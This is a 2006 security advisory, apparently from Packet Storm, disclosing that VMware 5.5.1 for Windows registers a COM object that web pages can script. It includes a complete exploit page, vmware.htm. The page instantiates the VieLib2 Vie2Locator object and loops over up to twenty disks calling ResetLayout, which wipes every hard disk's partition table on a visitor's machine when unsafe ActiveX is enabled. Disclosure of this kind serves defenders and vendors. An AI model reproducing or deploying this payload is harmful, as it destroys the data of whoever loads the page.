XSec-06-05.txt

2006-08-27T00:00:00
ID PACKETSTORM:49337
Type packetstorm
Reporter nop
Modified 2006-08-27T00:00:00

Description

                                        
                                            `Advisory ID:  
XSec-06-05  
  
Advisory Name:  
VMware 5.5.1 for Windows arbitrary partition table delete issue.  
  
Release Date:  
08/16/2006  
  
Tested on:  
VMware 5.5.1 build-19175 on Windows Server 2000/2003  
  
Affected version:  
VMware 5.5.1  
  
Author:  
nop <nop#xsec.org>  
http://www.xsec.org  
  
Overview:  
On running windows system, you can't delete, format and change system  
dirver. \  
VMware register a COM Object use for Virtual Disk, but it's very danger. \  
I don't know how to name this issue. If you allow unsafe ActiveX and  
jscript, \  
and has VMware installed, the vmware.htm will delete all harddisk  
partition \  
table on the windows system. please backup your partition table first.  
  
Exploit:  
  
=============== vmware.htm start ================  
  
<!--  
// VMware 5.5.1 for Windows arbitrary partition table delete issue.  
// Tested on Windows Server 2000/2003  
//  
// nop nop#xsec.org  
// http://www.xsec.org  
//  
  
// CLSID: {0F748FDE-0597-443C-8596-71854C5EA20A}  
// Info: Vie2Locator Class  
// ProgID: VieLib2.Vie2Locator.1  
// InprocServer32: C:\Program Files\Common Files\VMware\VMware Virtual  
Image Editing\vielib.dll  
  
--!>  
  
<html><body>  
<object classid="clsid:{0F748FDE-0597-443C-8596-71854C5EA20A}"  
id="vmware"> </object>  
<script>  
  
var disk = 0; // HardDisk No  
  
while (disk < 20)  
{  
var x = vmware.ConnectDisk(disk); // Connect to HardDisk  
x.ResetLayout(); // Will clean all partition table on your Harddisk  
disk += 1;  
}  
</script>  
</body></html>  
  
=============== vmware.htm end ==================  
  
Link:  
http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=13  
  
  
About XSec:  
We are redhat.  
  
  
`